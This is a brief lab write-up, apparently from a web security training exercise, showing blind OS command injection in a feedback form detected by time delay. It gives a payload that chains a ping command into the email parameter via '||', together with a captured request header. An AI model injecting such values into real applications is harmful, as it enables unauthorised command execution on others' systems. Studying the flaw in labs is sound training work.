Blind OS command injection with time delays


This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

Reproduction and proof of concept

  1. Use Burp Suite to intercept and modify the request that submits feedback.

  2. Modify the email parameter, changing it to: email=x||ping+-c+10+||

POST /feedback/submit HTTP/1.1
Cookie: session=PBI3JYi8xuN2EDvHhrWZseFHddKXZkn3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

  1. Observe that the response takes 10 seconds to return.


An attacker will need to exploit the blind OS command injection vulnerability to cause a 10 second delay.